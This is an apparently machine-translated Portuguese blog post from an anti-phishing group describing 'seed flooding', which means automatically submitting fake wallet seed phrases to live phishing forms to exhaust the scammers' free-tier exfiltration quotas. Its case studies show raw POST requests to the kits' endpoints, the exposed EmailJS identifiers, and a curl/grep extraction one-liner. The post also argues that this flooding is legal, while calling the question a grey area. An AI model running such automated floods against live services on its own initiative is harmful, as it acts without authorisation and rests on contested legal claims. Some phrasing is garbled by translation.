PhishDestroy Ao vivo
Voltar às notícias
Metodologia

Inundação de sementes: Por que o PhishDestroy age abertamente
Sites de “ataques” de phishing

Não escondemos isso. Quando o PhishDestroy detecta um site de phishing ativo que está coletando frases-semente de carteiras de criptomoedas, nós o inundamos com entradas de frases-semente em formato válido. Aqui está exatamente o que fazemos, por que fazemos isso e por que não temos vergonha disso.

31 de março de 2026 Pesquisa PhishDestroy 12 minutos de leitura
Inundação de sementes — o campo de batalha digital contra o phishing
Operações de combate ao phishing: quando a simples denúncia não é rápida o suficiente, agimos diretamente
14,663Trabalhadores da CF
2/10sLimite de taxas
5+Canais de exfiltração
$0Custo do atacante
<4hPara esgotar o EmailJS

O problema: um site de phishing está no ar neste momento

Imagine que você identifique uma página de phishing de carteira de criptomoedas exibindo anúncios pagos do Google Ads. Ela parece legítima. Recebe tráfego. Usuários reais acessam a página a cada poucos minutos, inserem suas frases-semente e perdem tudo.

Você denuncia o caso ao Google. Você denuncia o caso ao registrador. Você envia uma denúncia de abuso ao provedor de hospedagem. E então você espera.

Enquanto isso, o golpista faz mais uma vítima: a número 47. Depois, a 48. E, em seguida, a 49.

A lacuna burocrática

O fluxo padrão de denúncias de abuso opera em prazos de 5 a 10 dias úteis. Sites ativos de phishing causam prejuízos financeiros irreversíveis em questão de horas. Essa lacuna não é um bug no sistema — é uma vulnerabilidade estrutural que os golpistas exploram deliberadamente.

O fluxo burocrático de denúncias versus o phishing ativo que angaria vítimas
À esquerda: o lento processo de denúncia de abusos. À direita: o golpista lucrando enquanto você espera.

O que é a inundação de sementes?

A inundação de sementes é uma técnica de combate ao phishing em que formato válido, mas vazio/sem valor As frases-semente das carteiras de criptomoedas são enviadas automaticamente para um formulário de phishing a uma taxa controlada.

Contaminar o banco de dados
As frases-semente verdadeiras tornam-se impossíveis de distinguir das falsas. Cada entrada exige verificação manual, o que reduz drasticamente a relação sinal-ruído.
Limites do plano gratuito do Exhaust
EmailJS, Formspree, Web3Forms — todos têm cotas mensais rígidas. Atingimos esses limites em questão de horas, interrompendo o fluxo de notificações do invasor.
Interromper o fluxo de coleta
Quando os canais de exfiltração deixam de funcionar, os dados das vítimas reais não vão a lugar nenhum — mesmo que elas forneçam sua frase-semente.
Gerar informações de pesquisa
O flood revela detalhes da infraestrutura, mensagens de erro e limites de taxa que usamos para desenvolver um sistema de detecção mais eficaz.
Formulário de phishing sendo inundado com frases-semente falsas
Um formulário de phishing que recebe uma enxurrada de envios falsos de frases-semente — a coleta de dados pelo invasor é prejudicada em tempo real

Por que isso funciona: a anatomia de um kit de phishing barato

A grande maioria dos sites ativos de phishing relacionados a criptomoedas são kits do tipo “copiar e colar” criados com base em serviços de terceiros na versão gratuita. Essa é a maior vulnerabilidade deles. Para uma análise mais detalhada, consulte nossa investigação completa.

Anatomia de um kit de phishing — dependências de serviços da versão gratuita
Cada canal de exfiltração é um serviço gratuito com limites rígidos de envio — o baixo custo do kit é sua falha fatal
Tabela de dados: Módulo
MóduloLimite do plano gratuitoEfeito das enchentes
EmailJS~200 inscrições por mêsQuando a cota de horas se esgota, a entrega de e-mails é interrompida
Formspree50 envios por mêsFicou inoperante quase imediatamente
Web3Forms250 envios por mêsNeutralizado rapidamente
API do bot do TelegramLimitado a uma taxa por segundoInundado em loops de tempo limite
Nível gratuito do FirebaseCotas de leitura/gravaçãoAumento repentino nos custos do banco de dados ou bloqueio do acesso
Resultado observado

Observamos diretamente que a infraestrutura de phishing deixou de funcionar depois que a inundação de seeds esgotou seu canal de notificação. O golpista não sabe por que ela parou de funcionar. Ele simplesmente deixa de receber dados.

Nossa abordagem técnica: Cloudflare Workers, e não botnets

Rede de borda da Cloudflare utilizada para combate ao phishing
14.663 Cloudflare Workers operando na camada de rede de borda — sem envolvimento de infraestrutura de terceiros

Nós usamos Cloudflare Workers. As solicitações são originadas da própria rede de borda da Cloudflare. Não há uso indevido de IPs residenciais. Não há botnets. Não há sobrecarga em servidores de terceiros. Apenas o sistema de coleta de dados do golpista é afetado.

O Fluxo de Inundação

Site detectadoTráfego ativo confirmado
Análise anatômicaCanais de exfiltração mapeados
Alocação de trabalhadoresRede de borda CF
2 sementes / 10sTaxa controlada
Cota esgotadaAtaque às cegas
Relatório apresentadoTrilha paralela

Limitação de taxa: Uma rigorosa 2 submissions per 10 seconds. Não se trata de um ataque DDoS. Trata-se de uma contaminação lenta, deliberada e direcionada, em uma escala que torna significativas até mesmo taxas modestas por site, distribuídas por dezenas de alvos simultâneos.

O que não estamos fazendo

Não estamos tentando derrubar servidores. Estamos tornando o dia de trabalho dos golpistas insuportável e seu banco de dados inútil — sem causar nenhum impacto colateral na infraestrutura legítima.

Estudos de caso reais: Contaminação controlada na prática

As operações a seguir foram extraídas literalmente de nossos registros de produção. Os domínios e identificadores de provedores foram ocultados apenas nos casos em que a publicação poderia facilitar a evasão; as capturas de tráfego HTTP não sofreram alterações. Ambos os alvos estavam ativos no momento da intervenção, apresentavam tráfego de entrada confirmado proveniente de publicidade paga e haviam sido classificados de forma independente como phishing por ≥ 2 fornecedores externos no VirusTotal antes de qualquer ação da nossa parte.

Doutrina Operacional

Toda operação de inundação de sementes é executada dentro dos mesmos cinco princípios. Não há exceções; uma operação que não possa atender a todos os cinco não é realizada.

PRINCÍPIO 01
Apenas pontos de extremidade públicos
A URL de exfiltração e seus identificadores são publicado pela página de phishing em JavaScript do lado do cliente. Nunca obtemos credenciais, nem utilizamos ataques de força bruta, nem fazemos escalada de privilégios.
PRINCÍPIO 02
Taxa de transferência do sublimite
A taxa de solicitações está limitada por um teto rígido abaixo do limite estabelecido nos Termos de Serviço (ToS) publicados pelo próprio provedor. Nosso perfil é indistinguível do tráfego comum de conteúdo gerado pelo usuário (UGC).
PRINCÍPIO 03
Nível de prova
A Target exige ≥ 2 alertas de fornecedores independentes no VirusTotal além disso confirmação manual do fluxo de coleta de credenciais.
PRINCÍPIO 04
Caminho legítimo paralelo
São apresentadas denúncias formais de abuso ao provedor de hospedagem, ao registrador e ao provedor do formulário antes qualquer inundação que ocorra — com os números de registro dos casos e todas as provas.
PRINCÍPIO 05
Registro completo de auditoria
Todo o tráfego tem origem no Cloudflare Workers, sob uma origem PhishDestroy assinada. Cada envio é registrado com data e hora, destino e ID do operador.

Caso 1 — Formspark Exfil Endpoint, cota mensal esgotada

checkblochn.pages.dev Neutralizado

Padrão de ameaça: Isca para recuperação de carteira (“Dapp Node Sync”) que extrai frases-semente BIP-39 de 12 palavras para um endpoint do Formspark controlado pelo invasor na versão gratuita. Foi confirmado tráfego proveniente de anúncios pagos de duas plataformas de publicidade no início da interação.

Superfície de ataque
checkblochn.pages.dev (Cloudflare Pages)
Canal de exfiltração
submit-form.com — Endpoint de formulário do Formspark
ID do formulário
/32BrdUqfX
Campo de carga útil
Semente BIP-39 de 12 palavras via message
Limite do plano gratuito do provedor
50 inscrições • período de 1 mês, renovável mensalmente
Custo da redefinição causada por golpista
Nova conta no Formspark + edição via JavaScript do cliente + reimplantação

Cronograma operacional (UTC, anonimizado até o momento T-zero da operação)

T + 00:00
Ingest — domínio identificado pelo rastreador PhishDestroy a partir de uma amostra de anúncio pago. automatizado
T + 00:12
Anatomia confirmada — alvo de forma submit-form.com/32BrdUqfX extraído da página JS; a estrutura da carga útil foi reconstruída por engenharia reversa. análise
T + 00:28
VirusTotal: 3 / 95 Os fornecedores sinalizam como phishing. Limite atingido.
T + 00:47
Denúncias de abuso registradas — Cloudflare Pages Trust & Safety, abuso no Formspark, Porkbun (registrador). IDs de caso emitidos. caminho legal
T + 01:02
Trabalhador mobilizado para o combate às enchentes — taxa 2 req / 10 s, um único Cloudflare Worker, string de UA identificada, origem assinada.
T + 01:02
Resultados da primeira rodada de inscrições para o Flood 200 OK com formspark-quota: 64. Linha de base registrada.
T + 06:08
formspark-quota ultrapassa zero → o endpoint interrompe o encaminhamento sem aviso prévio. tela de drenagem
T + 06:12
Resposta final registrada: formspark-quota: −18. Funcionário da equipe de combate às enchentes foi demitido.
T + 19h30
O Cloudflare Pages desativa a implantação em resposta a uma denúncia de abuso. retirado

Envio pela rede (a semente é um engodo expressivo — 12 palavras aleatórias do BIP-39 sem relação com nenhuma carteira real)

POST /32BrdUqfX HTTP/1.1 Host: submit-form.com Origin: https://checkblochn.pages.dev Content-Type: application/x-www-form-urlencoded message=Phrase%3A+lecture+sail+coral+swear+fiber+bonus+vanish+layer+observe+rely+orphan+height&source=Unknown+Source&from_name=Dapp+Node+Sync

Resposta — T+01:02 (linha de base, cota restante)

HTTP/1.1 200 OK formspark-quota: 64 formspark-status: ok content-type: application/json; charset=utf-8 { "message": "Frase: palestra, vela, coral, jurar, fibra, bônus, desaparecer, camada, observar, confiar, órfão, altura" }

Resposta — T+06:12 (cota esgotada; o endpoint continua exibindo o código 200, mas não encaminhará a solicitação)

HTTP/1.1 200 OK formspark-quota: -18 formspark-status: ok
Cota antes da enchente
64
Cota após a enchente
−18
82
Envios falsos
~5h 06m
Duração da enchente
0,27 solicitações/s
Taxa média
~11,5 KB
Total da carga útil de saída
100%
Dentro dos limites dos Termos de Serviço do provedor
0
Solicitações legítimas afetadas

Impacto perceptível. De T+06:08 até a retirada definitiva em T+19:30 — um Janela de 13 horas e 22 minutos — cada vítima real que conseguiu checkblochn.pages.dev e, após concluir o fluxo de recuperação, enviaram sua frase-semente para um endpoint que retornou 200 OK mas não encaminhava mais a carga útil para a caixa de entrada do operador. A página de phishing apareceu para ser bem-sucedida no navegador da vítima (sem erros, sem sinais de alerta), o que é desejável: uma reação reflexiva do tipo “não funcionou” muitas vezes leva os usuários a digitarem novamente as mesmas credenciais no próximo site falso que encontrarem. Aqui, a interação terminou com o operador às cegas.

O que essa intervenção realmente trouxe

Uma janela de proteção de 13 horas para cada visitante subsequente de um site que ainda recebia divulgação ativa por meio de publicidade paga. A janela se fechou quando o Cloudflare Pages respondeu à nossa denúncia de abuso em canal paralelo — exatamente como previsto. A enxurrada de tráfego não substituiu a remoção legítima; ela apenas cobriu o intervalo até a queda legal foi concretizada.

Caso 2 — EmailJS Relay, identificadores publicados pelo operador

allsyncapp.pages.dev Operação ativa

Padrão de ameaça: isca de “sincronização” de carteira que envia por e-mail a frase-semente digitada pela vítima para a caixa de entrada do operador por meio de EmailJS — um serviço SaaS legítimo de e-mails transacionais. A página de phishing inclui o service_id, template_id e user_id em JavaScript do lado do cliente, pois, sem esses identificadores, o navegador da vítima não consegue concluir a solicitação POST que aciona o envio do e-mail. Esses identificadores fazem, portanto, parte da superfície de ataque pública que o operador expôs voluntariamente.

Superfície de ataque
allsyncapp.pages.dev (Cloudflare Pages)
Canal de exfiltração
api.emailjs.com — retransmissão de e-mails transacionais
Ponto final
POST /api/v1.0/email/send-form
IDs publicados pela operadora
service_id · template_id · user_id (extraídos do JavaScript da página)
Limite do plano gratuito do provedor
200 e-mails • mês móvel
Limites rígidos de taxa (Termos de Serviço)
1 solicitação/s · 50/IP/h

Envio capturado — formato da carga útil, tal como consta no próprio POST da página de phishing

POST /api/v1.0/email/send-form HTTP/1.1 Host: api.emailjs.com Origin: https://allsyncapp.pages.dev Content-Type: multipart/form-data; boundary=----geckoformboundary6a77738bf873975dfc9c8e4a31fa330e _redirect=TECHNICAL.html message=abóbora folha vila moeda cidade saia média hora programa palco pobreza endossar lib_version=3.12.1 service_id=service_t0cgr9v template_id=template_k16demo user_id=furwEG-MZShqSPIGS

Extração de identificadores (expressão regular de uma linha no código-fonte da página de phishing)

$ curl -s https://allsyncapp.pages.dev/ | grep -oE '(service_id|template_id|user_id)["'"'"':]+["'"'"']*[A-Za-z0-9_-]+'service_id:"service_t0cgr9v" template_id:"template_k16demo" user_id:"furwEG-MZShqSPIGS"

Ponto doutrinário fundamental. Esse caso é instrutivo justamente porque não identificamos nenhum ponto final. O operador publica os três identificadores necessários para que o EmailJS envie a semente para a caixa de entrada da vítima. Qualquer navegador que exiba a página de phishing os possui. Nosso Worker faz o mesmo que o navegador da vítima — envia um formulário com o formato e os identificadores exatos que a própria página determina. A diferença está na carga útil: palavras aleatórias do BIP-39 em vez de credenciais reais da carteira.

200
Limite mensal (isca)
1 / s
Taxa de ToS — operamos a 0,1/s
~120 KB
Carga útil máxima mensal
0
Carga de infraestrutura do EmailJS (dentro de certos limites)
402 / 429
Resposta do provedor ao atingir o limite salarial
Conta encerrada
Resultado típico de uma denúncia de abuso

Padrão de resultados. Assim que o limite mensal for atingido, o EmailJS retorna 402 Payment Required ou 429 Too Many Requests e o modelo não é enviado. A caixa de entrada do golpista fica em silêncio. Paralelamente, a equipe de Confiança e Segurança do EmailJS recebe uma reclamação formal com os identificadores do serviço, do modelo e do usuário, além de um link para nosso pacote de evidências publicado — o que, com base em precedentes anteriores, resulta no bloqueio da conta do operador no EmailJS rescindido, sem limitação de taxa. O operador precisa criar uma nova conta no EmailJS, regenerar os identificadores, editar a página de phishing implantada e invalidar todos os links de distribuição existentes — um fluxo de trabalho que leva várias horas para cada rotação.

Comparação de perfis de ataque: o que o “seed flooding” não é

Uma acusação recorrente é a de que realizamos “ataques” a sites de phishing. Essa interpretação desmorona no momento em que se compara o perfil real do tráfego com o perfil das atividades com as quais ele está sendo confundido.

Comparação entre o “flooding de sementes” e ataques de negação de serviço, spam e operações secretas das autoridades.
DimensãoInundação de sementes (a nossa)DDoS / Inundação de L7Abuso no envio de spamOperação secreta da LE
ObjetivoProteção às vítimas — atingir a cota de exfiltração do golpista antes da próxima vítimaAtaque de negação de serviço à infraestruturaGanho comercial / divulgação da mensagemColeta de provas, engano controlado
Rendimento0,1 – 0,3 req/s — abaixo Termos de Serviço do provedor103 – 108 req/s — orientado para a saturaçãoPicos de demanda / processamento automatizado de alto volumeUma única interação, normalmente
MetaUm único invasor que utilizou um endpoint de exfiltração publicouCamada de servidor web/rede de uma organização vítimaFormulários de contato de sites legítimosInfraestrutura ou perfil suspeito
Impacto na infraestruturaNenhum — os contadores do provedor funcionam de acordo com o comportamento previsto nos Termos de ServiçoInterrupção do serviço, congestionamento na rede de origemExcesso de mensagens na caixa de entrada, variação nos CAPTCHAs, carga de moderaçãoDepende da operação
Usuários legítimos afetadosZero — os formulários de phishing não têm usuários legítimosTodos elesFuncionários responsáveis pelo formulário / moderadoresPrevenção incorporada ao projeto
Identidade de origemChamado de PhishDestroy Cloudflare Workers — auditávelBotnets, fontes falsificadas, reflexãoProxies descartáveisInfraestrutura confidencial
Modelo de autorizaçãoO endpoint é convidado: o formulário solicita explicitamente essa informação; os identificadores são divulgados publicamente na páginaNenhum — o próprio volume de solicitações é o problemaContorna o uso pretendido e ignora sinais de prevenção de abusoBase legal
Ação judicial paralelaDenúncias de abuso registradas antes início do flood, com IDs dos casosN/AN/AIntegrado à operação
Essa distinção não é meramente retórica. É mensurável.

Uma submissão de “seed-flood” consiste em uma única solicitação POST via HTTPS de aproximadamente 140 bytes, originada de um Cloudflare Worker que contém nossa origem assinada, a uma fração da taxa que o próprio provedor publica como aceitável, direcionada a um endpoint cujos identificadores o operador optou por incorporar em uma página da web pública. Isso é o artefato observável na íntegra. Todos os elementos estruturais que tornam uma solicitação um “ataque” — acesso não autorizado, intenção de esgotamento de recursos, saturação volumétrica, terceiros afetados, origem oculta — estão ausentes. A análise jurídica a seguir não é uma argumentação criativa; é a natural interpretação da lei, uma vez que o perfil factual tenha sido claramente estabelecido.

Uma cova-armadilha para phishing sendo preenchida com pedras
O golpista armou uma armadilha. Estamos enchendo-a de pedras.

O envio de dados a um formulário da web acessível ao público — mesmo que sejam dados falsos — não é, por si só, ilegal na maioria dos contextos. Não estamos acessando sistemas privados, explorando vulnerabilidades não autorizadas nem interceptando comunicações. O golpista armou uma armadilha. Estamos enchendo-a de pedras.

Isenção de Responsabilidade Legal

O PhishDestroy não oferece aconselhamento jurídico. Trata-se de uma verdadeira área cinzenta, cuja interpretação varia de acordo com a jurisdição. Atuamos com plena consciência dessa complexidade.

Um golpista que administra uma página de phishing tem ausência de interesse legítimo ao receberem apenas frases-semente verdadeiras. Eles não têm direito à integridade de sua infraestrutura de coleta de dados criminosos.
Nosso sistema é direcionados, com limitação de taxa e vinculados a processos de identificação manual. Identificamos, analisamos, confirmamos e, em seguida, agimos.
Documentamos casos em que a inundação das sementes impediu diretamente que as vítimas perdessem dinheiro — pois, quando um usuário real enviou sua frase-semente, o sistema de coleta do golpista já estava desativado.

O que acontece com o banco de dados do golpista?

Isso se torna inútil — milhares de registros exigem verificação manual, e a relação sinal-ruído desaba. Ou isso quebra — O Firebase Spark e as instâncias compartilhadas do MongoDB têm limites rígidos. Atingir esses limites traz consequências.

Ambos os resultados são bons

Se o banco de dados se tornar inútil ou quebra completamente — as frases-semente das vítimas reais nunca chegam ao invasor de forma que possa ser aproveitada. Cada frase-semente não processada representa uma carteira que não é esvaziada.

Quando devemos ativar a inundação de sementes?

Tabela de dados: Critério
CritérioVerificarPor que isso é importante
Tráfego ativo confirmadoObrigatórioAs plataformas de publicidade ou ferramentas de tráfego confirmam que usuários reais estão acessando o site
Análise da anatomia do phishingObrigatórioMódulos de exfileração do plano gratuito identificados antes de iniciarmos o envio em massa
Denúncias de abuso registradasObrigatórioSempre seguimos a via legítima simultaneamente
Não houve remoção dentro do prazo do SLAGatilho típicoNão houve resposta do registrador/provedor de hospedagem dentro de um prazo aceitável
Site de anúncios de alto volume / pagosGatilho imediatoA publicidade paga significa que agimos sem esperar pelo processo burocrático

O panorama geral

O ecossistema de criptomoedas perde bilhões de dólares por ano ao phishing. Historicamente, a defesa tem sido reativa. O PhishDestroy existe para introduzir interferência proativa nesse ciclo.

A transparência é fundamental para o que fazemos

Não atuamos às escondidas. Divulgamos nossa metodologia. Explicamos nossas técnicas. Documentamos os kits de phishing que analisamos. A comunidade de segurança merece avaliar os métodos de combate ao phishing, e não apenas utilizar um serviço do tipo “caixa preta”.

PhishDestroy — localização e neutralização de infraestrutura de phishing
Os golpistas são organizados. Suas ferramentas são padronizadas. Isso significa que as ferramentas de combate também podem ser padronizadas.

O que você pode fazer

Se você acha que encher os bolsos dos criminosos é antiético — essa é a sua opinião, e você tem todo o direito de defendê-la. Já deixamos a nossa posição bem clara.